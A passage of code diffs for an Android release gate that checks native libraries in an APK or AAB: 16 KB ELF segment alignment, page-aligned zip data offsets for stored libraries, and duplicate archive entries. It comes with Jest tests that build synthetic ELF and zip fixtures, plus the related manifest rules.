   execFileSync('zip', ['-q', '-r', '-X', archive, ...roots], {cwd: staging});
+  return archive;
+}
+
+/**
+ * A zip written by hand, storing every entry uncompressed and controlling the
+ * byte offset its data lands on.
+ *
+ * `zip -q -r -X` cannot be used for this: it deflates even incompressible data,
+ * so a rule scoped to stored entries would have an empty subject set against
+ * every archive built above and pass having examined nothing. That is the same
+ * defect the rule exists to catch, one level up.
+ */
+function writeStoredArchive(name, entries, {align = 16384} = {}) {
+  const files = Object.entries(entries);
+  const locals = [];
+  const chunks = [];
+  let offset = 0;
+
+  for (const [entry, contents] of files) {
+    const nameBytes = Buffer.from(entry, 'utf-8');
+    const body = Buffer.isBuffer(contents) ? contents : Buffer.from(contents);
+    let padding = 0;
+    if (align) {
+      const unpadded = (offset + 30 + nameBytes.length) % align;
+      const wanted = unpadded === 0 ? 0 : align - unpadded;
+      // An extra field is a 4-byte header plus its payload, so a gap of 1-3
+      // bytes has to become a whole page instead.
+      padding = wanted === 0 ? 0 : wanted < 4 ? wanted + align : wanted;
+    }
+    const extra = Buffer.alloc(padding);
+    if (padding > 0) {
+      extra.writeUInt16LE(0xd935, 0); // the id Android's own aligner uses
+      extra.writeUInt16LE(padding - 4, 2);
+    }
+
+    const header = Buffer.alloc(30);
+    header.writeUInt32LE(0x04034b50, 0);
+    header.writeUInt16LE(20, 4);
+    header.writeUInt16LE(0, 8); // stored
+    header.writeUInt32LE(crc32(body), 14);
+    header.writeUInt32LE(body.length, 18);
+    header.writeUInt32LE(body.length, 22);
+    header.writeUInt16LE(nameBytes.length, 26);
+    header.writeUInt16LE(extra.length, 28);
+
+    locals.push({nameBytes, body, offset, extraLength: extra.length});
+    chunks.push(header, nameBytes, extra, body);
+    offset += 30 + nameBytes.length + extra.length + body.length;
+  }
+
+  const directoryAt = offset;
+  for (const local of locals) {
+    const central = Buffer.alloc(46);
+    central.writeUInt32LE(0x02014b50, 0);
+    central.writeUInt16LE(20, 4);
+    central.writeUInt16LE(20, 6);
+    central.writeUInt16LE(0, 10); // stored
+    central.writeUInt32LE(crc32(local.body), 16);
+    central.writeUInt32LE(local.body.length, 20);
+    central.writeUInt32LE(local.body.length, 24);
+    central.writeUInt16LE(local.nameBytes.length, 28);
+    central.writeUInt32LE(local.offset, 42);
+    chunks.push(central, local.nameBytes);
+    offset += 46 + local.nameBytes.length;
+  }
+
+  const end = Buffer.alloc(22);
+  end.writeUInt32LE(0x06054b50, 0);
+  end.writeUInt16LE(locals.length, 8);
+  end.writeUInt16LE(locals.length, 10);
+  end.writeUInt32LE(offset - directoryAt, 12);
+  end.writeUInt32LE(directoryAt, 16);
+  chunks.push(end);
+
+  const archive = path.join(workspace, name);
+  fs.writeFileSync(archive, Buffer.concat(chunks));
   return archive;
 }
 
@@ -625,6 +702,68 @@ describe('16 KB page alignment', () => {
       expect(output).not.toContain('artifact:');
     },
   );
+});
+
+describe('16 KB zip data offsets', () => {
+  // The app ships extractNativeLibs=false, so each library is mapped in place
+  // out of the archive and its start offset has to be page-aligned too. A
+  // conforming p_align at an unaligned offset still cannot be loaded.
+  it('passes an archive whose stored libraries start on a page boundary', () => {
+    const {status, output} = runGate([
+      '--apk',
+      writeStoredArchive('app-prod-release.apk', conformingEntries()),
+    ]);
+    expect(status).toBe(0);
+    // The guard against the subject set being empty: `zip` deflates even
+    // incompressible data, so a stored-scoped rule examines nothing unless the
+    // fixture is built stored on purpose.
+    expect(output).toContain('zip data offset: 12/12 stored libraries');
+    expect(output).toContain('zip data offset: 4/4 stored libraries');
+    expect(output).not.toContain('zip data offset: 0/0');
+  });
+
+  it('fails an archive with conforming segments at unaligned offsets', () => {
+    const {status, output} = runGate([
+      '--apk',
+      writeStoredArchive('app-prod-release.apk', conformingEntries(), {
+        align: 0,
+      }),
+    ]);
+    expect(status).toBe(1);
+    expect(output).toContain('MISPLACED  lib/arm64-v8a/');
+    expect(output).toContain('is not a multiple of 16384');
+    // The point of the case: the ELF side is untouched and still passes, so
+    // only the offset rule can be what refused it.
+    expect(output).toContain('segment alignment: 12/12 libraries');
+  });
+
+  it('reports deflated libraries as outside the subject set, not as passing', () => {
+    // `zip` deflates, so this is the legacy-packaging shape: nothing is mapped
+    // in place, nothing to align, and the counts have to say so.
+    const {status, output} = gateApk(conformingEntries());
+    expect(status).toBe(0);
+    expect(output).toContain('zip data offset: 0/0 stored libraries');
+    expect(output).toContain('12 deflated, extracted at install');
+  });
+
+  it('does not judge offsets in a bundle, which bundletool repackages', () => {
+    const archive = writeStoredArchive(
+      'app-prod-release.aab',
+      conformingEntries('base/'),
+      {align: 0},
+    );
+    const {status, output} = runGate(['--aab', archive]);
+    expect(status).toBe(0);
+    expect(output).not.toContain('zip data offset');
+  });
+
+  it('fails when the archive layout cannot be read at all', () => {
+    const archive = path.join(workspace, 'no-directory.apk');
+    fs.writeFileSync(archive, Buffer.alloc(512, 0x41));
+    const {status, output} = runGate(['--apk', archive]);
+    expect(status).toBe(1);
+    expect(output).toContain('proven nothing about it');
+  });
 });
 
 describe('a check that cannot run', () => {

--- a/scripts/__tests__/verify-android-payload.test.js
+++ b/scripts/__tests__/verify-android-payload.test.js
@@ -3,6 +3,8 @@ const fs = require('fs');
 const os = require('os');
 const path = require('path');
 
+const {readProgramHeaders} = require('../verify-android-payload.js');
+
 const SCRIPT_PATH = path.join(__dirname, '..', 'verify-android-payload.js');
 const MANIFEST_PATH = path.join(
   __dirname,
@@ -13,16 +15,29 @@ const manifest = JSON.parse(fs.readFileSync(MANIFEST_PATH, 'utf-8'));
 
 const ELF64_SHDR_SIZE = 64;
 const ELF64_SYM_SIZE = 24;
+const ELF32_PHDR_SIZE = 32;
+const ELF64_PHDR_SIZE = 56;
+const PT_LOAD = 1;
+const PT_DYNAMIC = 2;
+
+/** What the NDK's max-page-size produces, and what the manifest declares. */
+const ALIGNED_SEGMENTS = [
+  {type: PT_LOAD, align: 16384},
+  {type: PT_LOAD, align: 16384},
+];
 
 /**
  * A minimal little-endian AArch64 ELF64 shared object carrying nothing but a
- * `.dynsym` and its string table.
+ * `.dynsym`, its string table, and a program header table.
  *
  * Synthetic rather than committed binaries: the cases that matter most here —
  * a `.dynsym` that is absent, or present but empty — are artifacts no compiler
  * emits, and a committed `.so` could not be reviewed.
  */
-function buildElf(symbols, {omitDynsym = false, emptyDynsym = false} = {}) {
+function buildElf(
+  symbols,
+  {omitDynsym = false, emptyDynsym = false, segments = ALIGNED_SEGMENTS} = {},
+) {
   let dynstr = Buffer.from([0]);
   const nameOffsets = [];
   for (const symbol of symbols) {
@@ -45,8 +60,16 @@ function buildElf(symbols, {omitDynsym = false, emptyDynsym = false} = {}) {
     });
   }
 
+  const phdrs = Buffer.alloc(segments.length * ELF64_PHDR_SIZE);
+  segments.forEach((segment, i) => {
+    const at = i * ELF64_PHDR_SIZE;
+    phdrs.writeUInt32LE(segment.type, at);
+    phdrs.writeBigUInt64LE(BigInt(segment.align), at + 48);
+  });
+
   const align8 = n => n + ((8 - (n % 8)) % 8);
-  const dynstrOffset = ELF64_SHDR_SIZE;
+  const phoff = ELF64_SHDR_SIZE;
+  const dynstrOffset = align8(phoff + phdrs.length);
   const dynsymOffset = align8(dynstrOffset + dynstr.length);
   const shoff = align8(dynsymOffset + dynsym.length);
   const sectionCount = omitDynsym ? 2 : 3;
@@ -59,8 +82,11 @@ function buildElf(symbols, {omitDynsym = false, emptyDynsym = false} = {}) {
   header.writeUInt16LE(3, 16); // ET_DYN
   header.writeUInt16LE(0xb7, 18); // EM_AARCH64
   header.writeUInt32LE(1, 20);
+  header.writeBigUInt64LE(BigInt(segments.length > 0 ? phoff : 0), 0x20);
   header.writeBigUInt64LE(BigInt(shoff), 0x28);
   header.writeUInt16LE(ELF64_SHDR_SIZE, 52);
+  header.writeUInt16LE(ELF64_PHDR_SIZE, 0x36);
+  header.writeUInt16LE(segments.length, 0x38);
   header.writeUInt16LE(ELF64_SHDR_SIZE, 0x3a);
   header.writeUInt16LE(sectionCount, 0x3c);
 
@@ -86,6 +112,7 @@ function buildElf(symbols, {omitDynsym = false, emptyDynsym = false} = {}) {
 
   const out = Buffer.alloc(shoff + sections.length);
   header.copy(out, 0);
+  phdrs.copy(out, phoff);
   dynstr.copy(out, dynstrOffset);
   dynsym.copy(out, dynsymOffset);
   sections.copy(out, shoff);
@@ -122,17 +149,54 @@ function hexagonDynsym(matchCount, {withRequired = true} = {}) {
 
 /**
  * A DSP library as far as the check is concerned: ELF32, little-endian, and
- * targeting EM_QDSP6. The real ones are 650-730 KB of Hexagon code; only the
- * header is asserted, so only the header is built.
+ * targeting EM_QDSP6, at the 4 KB alignment the shipped ones actually carry.
+ * The real ones are 650-730 KB of Hexagon code; only the headers are read, so
+ * only the headers are built.
  */
-function buildDspStub(machine = 164) {
-  const out = Buffer.alloc(52);
+function buildDspStub(
+  machine = 164,
+  segments = [
+    {type: PT_LOAD, align: 4096},
+    {type: PT_LOAD, align: 4096},
+  ],
+) {
+  const phoff = 52;
+  const out = Buffer.alloc(phoff + segments.length * ELF32_PHDR_SIZE);
   out.writeUInt32BE(0x7f454c46, 0);
   out.writeUInt8(1, 4); // ELFCLASS32
   out.writeUInt8(1, 5); // ELFDATA2LSB
   out.writeUInt8(1, 6);
   out.writeUInt16LE(3, 16); // ET_DYN
   out.writeUInt16LE(machine, 18);
+  out.writeUInt32LE(segments.length > 0 ? phoff : 0, 0x1c);
+  out.writeUInt16LE(ELF32_PHDR_SIZE, 42);
+  out.writeUInt16LE(segments.length, 44);
+  segments.forEach((segment, i) => {
+    const at = phoff + i * ELF32_PHDR_SIZE;
+    out.writeUInt32LE(segment.type, at);
+    out.writeUInt32LE(segment.align, at + 28);
+  });
+  return out;
+}
+
+/** Neither of the two shapes the rest of this file builds: 32-bit, MSB. */
+function buildBigEndianElf(aligns) {
+  const phoff = 52;
+  const out = Buffer.alloc(phoff + aligns.length * ELF32_PHDR_SIZE);
+  out.writeUInt32BE(0x7f454c46, 0);
+  out.writeUInt8(1, 4); // ELFCLASS32
+  out.writeUInt8(2, 5); // ELFDATA2MSB
+  out.writeUInt8(1, 6);
+  out.writeUInt16BE(3, 16); // ET_DYN
+  out.writeUInt16BE(20, 18); // EM_PPC
+  out.writeUInt32BE(phoff, 0x1c);
+  out.writeUInt16BE(ELF32_PHDR_SIZE, 42);
+  out.writeUInt16BE(aligns.length, 44);
+  aligns.forEach((align, i) => {
+    const at = phoff + i * ELF32_PHDR_SIZE;
+    out.writeUInt32BE(PT_LOAD, at);
+    out.writeUInt32BE(align, at + 28);
+  });
   return out;
 }
 
@@ -223,6 +287,44 @@ describe('the variant allowlist', () => {
 
   it('needs no artifact, so it is safe to call before anything is built', () => {
     expect(runGate(['--print-variants']).status).toBe(0);
+  });
+});
+
+describe('the program-header reader', () => {
+  // The DSP assets are ELF32 and nothing guarantees the byte order of every
+  // object the platform loads, so a reader that copied readDynsym's
+  // little-endian 64-bit assertion would throw instead of judging.
+  it.each([
+    [
+      'a 64-bit little-endian object',
+      () => buildElf([], {emptyDynsym: true}),
+      [16384, 16384],
+    ],
+    ['a 32-bit little-endian object', () => buildDspStub(), [4096, 4096]],
+    ['a 32-bit big-endian object', () => buildBigEndianElf([65536]), [65536]],
+  ])('reads the segment alignments of %s', (_label, build, aligns) => {
+    const headers = readProgramHeaders(build());
+    expect(headers.map(header => header.align)).toEqual(aligns);
+    expect(headers.every(header => header.type === PT_LOAD)).toBe(true);
+  });
+
+  it('agrees with the builder on an arbitrary segment list', () => {
+    const segments = [
+      {type: PT_DYNAMIC, align: 8},
+      {type: PT_LOAD, align: 4096},
+      {type: PT_LOAD, align: 16384},
+    ];
+    expect(
+      readProgramHeaders(buildElf([], {emptyDynsym: true, segments})),
+    ).toEqual(
+      segments.map(segment => ({type: segment.type, align: segment.align})),
+    );
+  });
+
+  it('refuses an object with no program header table rather than reading none', () => {
+    expect(() =>
+      readProgramHeaders(buildElf([], {emptyDynsym: true, segments: []})),
+    ).toThrow('program headers are absent');
   });
 });
 

--- a/scripts/android-payload-manifest.json
+++ b/scripts/android-payload-manifest.json
@@ -5,10 +5,12 @@
     "mustExportRule": "mustExport names must be DEFINED in .dynsym (st_shndx != SHN_UNDEF). An undefined import proves only that something references the symbol, not that it was compiled in.",
     "extraLibsRule": "librnllama* libraries beyond requiredLibs are reported and permitted, not failed: forcing prebuilts (ORG_GRADLE_PROJECT_rnllamaBuildFromSource=false) legitimately produces all seven arm64 variants.",
     "assetScopeRule": "assets.required paths resolve from the artifact root, and the block sits beside abis[] rather than inside it: Android packages assets/ once per artifact, not per ABI (verified against a built APK). scope admits only \"artifact\" — declaring \"abi\" is refused, because no supported packaging mechanism delivers it.",
+    "libPackagingRule": "nativeLibsMappedInPlace records that the app ships extractNativeLibs=false, so Android maps each lib/<abi>/*.so straight out of the APK instead of extracting it at install. Two consequences the gate enforces: the zip data offset must be page-aligned, and every library must be STORED — a deflated one cannot be mapped and is unloadable on every device, not only 16 KB ones. The attribute is injected by AGP from the useLegacyPackaging=false default rather than written in any source file, so it is declared here where a change to it is reviewed.",
     "libAlignmentRule": "requiredLibAlignment is the minimum p_align of every PT_LOAD segment of every library shipped under lib/<abi>/, not only the required ones: Android 15+ loads all of them on a 16 KB-page device. The script floors it at 16384 and will not accept less, because lowering the number is the cheapest edit that unblocks a failing build. The DSP assets are outside the subject set — they are Hexagon objects at p_align 4096, loaded by the DSP and not by Android.",
     "assetUsabilityRule": "usableByAbis is a claim about which shipped lib/<abi>/ trees carry a library able to load the assets, not a packaging directive — assets are not ABI-scoped, so the DSP payload reaches every ABI regardless. It is asserted against the artifact: an ABI is listed iff its tree carries a non-wrapper _hexagon library.",
     "assetFormatRule": "Every required asset is checked to be an ELF object for assets.elfMachine. Presence by filename is not enough: a file of the right name that is not a DSP library produces the same user-visible outcome as a missing backend, with a passing report. 164 is EM_QDSP6."
   },
+  "nativeLibsMappedInPlace": true,
   "assets": {
     "scope": "artifact",
     "required": [

--- a/scripts/android-payload-manifest.json
+++ b/scripts/android-payload-manifest.json
@@ -5,6 +5,7 @@
     "mustExportRule": "mustExport names must be DEFINED in .dynsym (st_shndx != SHN_UNDEF). An undefined import proves only that something references the symbol, not that it was compiled in.",
     "extraLibsRule": "librnllama* libraries beyond requiredLibs are reported and permitted, not failed: forcing prebuilts (ORG_GRADLE_PROJECT_rnllamaBuildFromSource=false) legitimately produces all seven arm64 variants.",
     "assetScopeRule": "assets.required paths resolve from the artifact root, and the block sits beside abis[] rather than inside it: Android packages assets/ once per artifact, not per ABI (verified against a built APK). scope admits only \"artifact\" — declaring \"abi\" is refused, because no supported packaging mechanism delivers it.",
+    "libAlignmentRule": "requiredLibAlignment is the minimum p_align of every PT_LOAD segment of every library shipped under lib/<abi>/, not only the required ones: Android 15+ loads all of them on a 16 KB-page device. The script floors it at 16384 and will not accept less, because lowering the number is the cheapest edit that unblocks a failing build. The DSP assets are outside the subject set — they are Hexagon objects at p_align 4096, loaded by the DSP and not by Android.",
     "assetUsabilityRule": "usableByAbis is a claim about which shipped lib/<abi>/ trees carry a library able to load the assets, not a packaging directive — assets are not ABI-scoped, so the DSP payload reaches every ABI regardless. It is asserted against the artifact: an ABI is listed iff its tree carries a non-wrapper _hexagon library.",
     "assetFormatRule": "Every required asset is checked to be an ELF object for assets.elfMachine. Presence by filename is not enough: a file of the right name that is not a DSP library produces the same user-visible outcome as a missing backend, with a passing report. 164 is EM_QDSP6."
   },
@@ -22,6 +23,7 @@
   "abis": [
     {
       "abi": "arm64-v8a",
+      "requiredLibAlignment": 16384,
       "requiredLibs": [
         "librnllama.so",
         "librnllama_jni.so",
@@ -52,6 +54,7 @@
     },
     {
       "abi": "x86_64",
+      "requiredLibAlignment": 16384,
       "requiredLibs": [
         "librnllama.so",
         "librnllama_jni.so",

--- a/scripts/android-payload-manifest.json
+++ b/scripts/android-payload-manifest.json
@@ -4,8 +4,18 @@
     "countRule": "expectedMatchCount counts every .dynsym entry whose name contains the pattern, case-insensitively, including undefined imports. The declared numbers were measured with `llvm-nm -D <lib> | grep -ci <pattern>`, so the reader must match that convention or the two are calibrated differently.",
     "mustExportRule": "mustExport names must be DEFINED in .dynsym (st_shndx != SHN_UNDEF). An undefined import proves only that something references the symbol, not that it was compiled in.",
     "extraLibsRule": "librnllama* libraries beyond requiredLibs are reported and permitted, not failed: forcing prebuilts (ORG_GRADLE_PROJECT_rnllamaBuildFromSource=false) legitimately produces all seven arm64 variants.",
-    "assetScopeRule": "requiredAssets paths are NOT ABI-scoped: Android packages assets/ once per artifact, not per ABI (verified against a built APK). They are declared under the ABI whose libraries need them, which is what ties the accelerator floor to the right ABI, but the path is resolved from the artifact root.",
-    "assetFormatRule": "An ABI declaring requiredAssets must also declare requiredAssetElfMachine, and every required asset is checked to be an ELF object for that machine. Presence by filename is not enough: a file of the right name that is not a DSP library produces the same user-visible outcome as a missing backend, with a passing report. 164 is EM_QDSP6."
+    "assetScopeRule": "assets.required paths resolve from the artifact root, and the block sits beside abis[] rather than inside it: Android packages assets/ once per artifact, not per ABI (verified against a built APK). scope admits only \"artifact\" — declaring \"abi\" is refused, because no supported packaging mechanism delivers it.",
+    "assetFormatRule": "Every required asset is checked to be an ELF object for assets.elfMachine. Presence by filename is not enough: a file of the right name that is not a DSP library produces the same user-visible outcome as a missing backend, with a passing report. 164 is EM_QDSP6."
+  },
+  "assets": {
+    "scope": "artifact",
+    "required": [
+      "assets/ggml-hexagon/libggml-htp-v73.so",
+      "assets/ggml-hexagon/libggml-htp-v75.so",
+      "assets/ggml-hexagon/libggml-htp-v79.so",
+      "assets/ggml-hexagon/libggml-htp-v81.so"
+    ],
+    "elfMachine": 164
   },
   "abis": [
     {
@@ -24,12 +34,6 @@
         "librnllama_v8_2_dotprod_i8mm_hexagon_opencl.so",
         "librnllama_jni_v8_2_dotprod_i8mm_hexagon_opencl.so"
       ],
-      "requiredAssets": [
-        "assets/ggml-hexagon/libggml-htp-v73.so",
-        "assets/ggml-hexagon/libggml-htp-v75.so",
-        "assets/ggml-hexagon/libggml-htp-v79.so",
-        "assets/ggml-hexagon/libggml-htp-v81.so"
-      ],
       "requiredSymbols": [
         {
           "lib": "librnllama_v8_2_dotprod_i8mm_hexagon_opencl.so",
@@ -42,8 +46,7 @@
             "count": 16
           }
         }
-      ],
-      "requiredAssetElfMachine": 164
+      ]
     },
     {
       "abi": "x86_64",
@@ -53,7 +56,6 @@
         "librnllama_x86_64.so",
         "librnllama_jni_x86_64.so"
       ],
-      "requiredAssets": [],
       "requiredSymbols": []
     }
   ]

--- a/scripts/android-payload-manifest.json
+++ b/scripts/android-payload-manifest.json
@@ -5,6 +5,7 @@
     "mustExportRule": "mustExport names must be DEFINED in .dynsym (st_shndx != SHN_UNDEF). An undefined import proves only that something references the symbol, not that it was compiled in.",
     "extraLibsRule": "librnllama* libraries beyond requiredLibs are reported and permitted, not failed: forcing prebuilts (ORG_GRADLE_PROJECT_rnllamaBuildFromSource=false) legitimately produces all seven arm64 variants.",
     "assetScopeRule": "assets.required paths resolve from the artifact root, and the block sits beside abis[] rather than inside it: Android packages assets/ once per artifact, not per ABI (verified against a built APK). scope admits only \"artifact\" — declaring \"abi\" is refused, because no supported packaging mechanism delivers it.",
+    "assetUsabilityRule": "usableByAbis is a claim about which shipped lib/<abi>/ trees carry a library able to load the assets, not a packaging directive — assets are not ABI-scoped, so the DSP payload reaches every ABI regardless. It is asserted against the artifact: an ABI is listed iff its tree carries a non-wrapper _hexagon library.",
     "assetFormatRule": "Every required asset is checked to be an ELF object for assets.elfMachine. Presence by filename is not enough: a file of the right name that is not a DSP library produces the same user-visible outcome as a missing backend, with a passing report. 164 is EM_QDSP6."
   },
   "assets": {
@@ -15,7 +16,8 @@
       "assets/ggml-hexagon/libggml-htp-v79.so",
       "assets/ggml-hexagon/libggml-htp-v81.so"
     ],
-    "elfMachine": 164
+    "elfMachine": 164,
+    "usableByAbis": ["arm64-v8a"]
   },
   "abis": [
     {

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -525,6 +525,14 @@ function readZipIndex(archive) {
       });
       at += 46 + nameLength + extraLength + commentLength;
     }
+    // A repeated name overwrites its earlier entry, so the map can hold fewer
+    // libraries than the archive declares and every count taken from it reads
+    // as complete.
+    if (index.size !== count) {
+      throw new Error(
+        `the central directory declares ${count} entries but names ${index.size} distinct paths`,
+      );
+    }
     return index;
   } finally {
     fs.closeSync(fd);
@@ -676,6 +684,17 @@ function readDynsym(buf) {
   return symbols;
 }
 
+/**
+ * The llama.rn version installed **on the machine running this check**, which
+ * is not a fact about the artifact: a report can be produced against an APK
+ * built from any other version. It is printed to make a drifted symbol count
+ * easier to explain, and labelled as the build host's so it cannot be read as
+ * a property of what shipped.
+ *
+ * Constrained to a semver-shaped string. `package.json` is arbitrary JSON from
+ * a dependency tree, and an unvalidated value writes whatever it likes into
+ * the evidence.
+ */
 function installedLlamaRnVersion() {
   try {
     const pkg = JSON.parse(
@@ -684,7 +703,9 @@ function installedLlamaRnVersion() {
         'utf-8',
       ),
     );
-    return pkg.version || 'unknown';
+    return /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/.test(pkg.version)
+      ? pkg.version
+      : 'unknown';
   } catch {
     return 'unknown';
   }
@@ -737,7 +758,7 @@ function checkSymbolRule({rule, archive, artifactName, entry, report, fail}) {
     symbol.name.toLowerCase().includes(pattern),
   ).length;
   report.push(
-    `      ${matched} .dynsym entries matching "${expected.pattern}" (declared ${expected.count}), llama.rn ${installedLlamaRnVersion()}`,
+    `      ${matched} .dynsym entries matching "${expected.pattern}" (declared ${expected.count}), built here against llama.rn ${installedLlamaRnVersion()}`,
   );
   if (matched !== expected.count && missing.length === 0) {
     fail(
@@ -860,13 +881,21 @@ function checkAlignment({
     .filter(inTree)
     .sort();
   const listed = [...entries].filter(inTree).sort();
-  if (zipIndex && listed.join('\n') !== libs.join('\n')) {
+  const disagreement = new Set(
+    zipIndex
+      ? [
+          ...listed.filter(name => !libs.includes(name)),
+          ...libs.filter(name => !listed.includes(name)),
+        ]
+      : [],
+  );
+  if (disagreement.size > 0) {
     report.push(
-      `      UNREADABLE  ${prefix}lib/${abi.abi}/ — the entry listing and the archive layout name different libraries`,
+      `      UNREADABLE  ${prefix}lib/${abi.abi}/ — ${[...disagreement].sort().join(', ')}`,
     );
     fail(
       [
-        `${artifactName} lists ${listed.length} libraries under ${prefix}lib/${abi.abi}/ but its central directory names ${libs.length}.`,
+        `${artifactName} names ${[...disagreement].sort().join(', ')} under ${prefix}lib/${abi.abi}/ in one reading of the archive and not the other.`,
         'The two readings of one archive disagree, so neither can be trusted to say what ships.',
         'The payload check could not run, so it reports failure rather than success —',
         'a check that cannot read the artifact has proven nothing about it.',
@@ -951,19 +980,9 @@ function checkAlignment({
   // the APK, so a deflated entry is not a library checked under some other
   // rule — it is one the loader cannot map at all, on any device. Skipping it
   // here would excuse the more serious fault of the two.
-  const indexed = libs.filter(entry => zipIndex.has(entry));
-  // A library dropped between the subject set and the index would otherwise
-  // shrink the denominator and read as a clean pass over fewer things.
-  for (const entry of libs.filter(name => !zipIndex.has(name))) {
-    report.push(`      UNINDEXED  ${entry}`);
-    fail(
-      [
-        `${entry} is listed in ${artifactName} but absent from its central directory.`,
-        'The payload check could not run, so it reports failure rather than success —',
-        'a check that cannot read the artifact has proven nothing about it.',
-      ].join('\n      '),
-    );
-  }
+  const indexed = libs;
+  // `libs` is taken from the index, so every entry is in it by construction —
+  // a name in one reading and not the other is caught above instead.
   const deflated = indexed.filter(entry => !zipIndex.get(entry).stored);
   const misplaced = indexed.filter(
     entry =>

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -41,6 +41,7 @@ const ELF64_SHDR_SIZE = 64;
 const ELF32_PHDR_SIZE = 32;
 const ELF64_PHDR_SIZE = 56;
 const ELF32_EHDR_SIZE = 52;
+const ELF64_EHDR_SIZE = 64;
 
 // What the NDK already produces (`-Wl,-z,max-page-size=16384`) and what
 // Android 15+ requires of shared libraries on 16 KB-page devices. The manifest
@@ -433,7 +434,7 @@ function readProgramHeaders(buf) {
   }
   const elf64 = buf[4] === 2;
   const littleEndian = buf[5] === 1;
-  if (elf64 && buf.length < ELF64_SHDR_SIZE) {
+  if (elf64 && buf.length < ELF64_EHDR_SIZE) {
     throw new Error('file is too short to be an ELF object');
   }
 

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -42,6 +42,12 @@ const ELF32_PHDR_SIZE = 32;
 const ELF64_PHDR_SIZE = 56;
 const ELF32_EHDR_SIZE = 52;
 
+// What the NDK already produces (`-Wl,-z,max-page-size=16384`) and what
+// Android 15+ requires of shared libraries on 16 KB-page devices. The manifest
+// declares the requirement per ABI; this is only the floor it cannot undercut,
+// because a lowered number is the cheapest edit that unblocks a failing build.
+const MIN_LIB_ALIGNMENT = 16384;
+
 function usage() {
   return [
     'Usage:',
@@ -205,6 +211,35 @@ function assertAcceleratorFloors(abi, manifestPath) {
   }
 }
 
+function isPowerOfTwo(value) {
+  if (!Number.isInteger(value) || value < 1) {
+    return false;
+  }
+  let remaining = value;
+  while (remaining % 2 === 0) {
+    remaining /= 2;
+  }
+  return remaining === 1;
+}
+
+function assertAlignmentFloor(abi, manifestPath) {
+  const declared = abi.requiredLibAlignment;
+  if (!isPowerOfTwo(declared)) {
+    refuseAbi(
+      abi,
+      manifestPath,
+      'no requiredLibAlignment that is an integer power of two',
+    );
+  }
+  if (declared < MIN_LIB_ALIGNMENT) {
+    refuseAbi(
+      abi,
+      manifestPath,
+      `a requiredLibAlignment of ${declared}, under the ${MIN_LIB_ALIGNMENT}-byte floor`,
+    );
+  }
+}
+
 /**
  * The DSP libraries are extracted as a set at runtime and the backend is
  * disabled outright if any one is missing, so a compiled-in accelerator with
@@ -293,6 +328,11 @@ function loadManifest(manifestPath) {
   assertAssetFloors(manifest, manifestPath);
   for (const abi of manifest.abis) {
     assertAcceleratorFloors(abi, manifestPath);
+  }
+  // Last, so that a manifest weakened in some other way is still refused with
+  // the message that names what it weakened.
+  for (const abi of manifest.abis) {
+    assertAlignmentFloor(abi, manifestPath);
   }
   return manifest;
 }
@@ -665,6 +705,101 @@ function checkAssets({
   }
 }
 
+/**
+ * Every shipped library of one ABI, not only the required ones: alignment is a
+ * property of what the platform loads, and the libraries this manifest does
+ * not name are loaded by the same linker on the same device.
+ *
+ * The DSP assets are deliberately outside the subject set. They are ELF32
+ * Hexagon objects at `p_align` 4096, loaded by the DSP rather than by Android,
+ * so one floor spanning both would fail the gate on a correct artifact.
+ */
+function checkAlignment({
+  archive,
+  prefix,
+  entries,
+  abi,
+  artifactName,
+  report,
+  fail,
+}) {
+  const libs = [...entries]
+    .filter(
+      entry =>
+        entry.startsWith(`${prefix}lib/${abi.abi}/`) && entry.endsWith('.so'),
+    )
+    .sort();
+  const declared = abi.requiredLibAlignment;
+  const judged = libs.map(entry => {
+    try {
+      const loads = readProgramHeaders(readZipEntry(archive, entry)).filter(
+        header => header.type === PT_LOAD,
+      );
+      const offending = loads.filter(
+        header => header.align < declared || !isPowerOfTwo(header.align),
+      );
+      return {
+        entry,
+        loads: loads.length,
+        worst:
+          offending.length > 0
+            ? Math.min(...offending.map(header => header.align))
+            : null,
+      };
+    } catch (err) {
+      return {entry, unreadable: err.message};
+    }
+  });
+
+  const conforming = judged.filter(
+    lib => !lib.unreadable && lib.loads > 0 && lib.worst === null,
+  ).length;
+  report.push(
+    `    segment alignment: ${conforming}/${libs.length} libraries at p_align >= ${declared}`,
+  );
+
+  for (const lib of judged) {
+    if (lib.unreadable) {
+      report.push(`      UNREADABLE  ${lib.entry} — ${lib.unreadable}`);
+      fail(
+        [
+          `could not read the program headers of ${lib.entry} in ${artifactName}: ${lib.unreadable}.`,
+          'The payload check could not run, so it reports failure rather than success —',
+          'a check that cannot read the artifact has proven nothing about it.',
+        ].join('\n      '),
+      );
+      continue;
+    }
+    // An object with nothing to load proves nothing about its alignment, so it
+    // is an instrument failure rather than a pass.
+    if (lib.loads === 0) {
+      report.push(`      NO PT_LOAD  ${lib.entry}`);
+      fail(
+        [
+          `${lib.entry} in ${artifactName} has no PT_LOAD segment, so its alignment could not be judged.`,
+          'The payload check could not run, so it reports failure rather than success —',
+          'a check that cannot read the artifact has proven nothing about it.',
+        ].join('\n      '),
+      );
+      continue;
+    }
+    if (lib.worst !== null) {
+      report.push(
+        `      MISALIGNED  ${lib.entry} (PT_LOAD p_align ${lib.worst})`,
+      );
+      fail(
+        [
+          `${lib.entry} in ${artifactName} has a PT_LOAD segment at p_align ${lib.worst};`,
+          `scripts/android-payload-manifest.json requires at least ${declared} for ${abi.abi}.`,
+          'Android 15+ refuses to load a shared library whose segments are not page-aligned on a',
+          '16 KB-page device. The NDK produces this alignment by default, so a library below it',
+          'came from a toolchain or linker flag that overrode it — fix the build, not the manifest.',
+        ].join('\n      '),
+      );
+    }
+  }
+}
+
 function checkArtifact({archive, kind, manifest, report, failures}) {
   const artifactName = path.basename(archive);
   const prefix = kind === 'aab' ? 'base/' : '';
@@ -751,6 +886,16 @@ function checkArtifact({archive, kind, manifest, report, failures}) {
         ].join('\n      '),
       );
     }
+
+    checkAlignment({
+      archive,
+      prefix,
+      entries,
+      abi,
+      artifactName,
+      report,
+      fail,
+    });
 
     const extras = [...entries]
       .filter(entry => entry.startsWith(`${prefix}lib/${abi.abi}/librnllama`))

--- a/scripts/verify-android-payload.js
+++ b/scripts/verify-android-payload.js
@@ -135,6 +135,18 @@ function assertRuleDemandsSomething(rule, manifestPath) {
   }
 }
 
+/**
+ * A library that carries the Hexagon backend itself, as opposed to the JNI
